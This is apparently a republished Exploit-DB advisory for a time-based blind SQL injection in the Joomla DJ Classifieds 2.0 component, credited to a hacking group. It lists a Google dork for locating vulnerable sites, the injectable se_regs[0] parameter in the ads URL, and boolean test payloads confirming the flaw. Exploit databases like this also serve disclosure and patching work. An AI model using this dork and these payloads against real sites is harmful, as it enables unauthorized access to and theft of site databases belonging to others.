Joomla! Component dj-classifieds 2.0 – Blind SQL Injection - 体验盒子

作者： Napsterakos

日期： 2013-05-06

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/25248/

 $$$$$$\$$\ $$\ $$$$$$\
$$__$$\ $$ |$$ | $$__$$\ 
$$ /\__|$$ |$$ | $$ /\__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ |$$__$$ |\____$$\ 
$$ |$$ |$$ |$$ | $$\ $$ |
\$$$$$$|$$\ $$ |$$ |$$\\$$$$$$|
 \______/ \__|\__|\__|\__|\______/ 
 
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux


Link: http://server/joomla/index.php/dj-classifieds/

Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]

# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1

Credits to: Greek Hacking Scene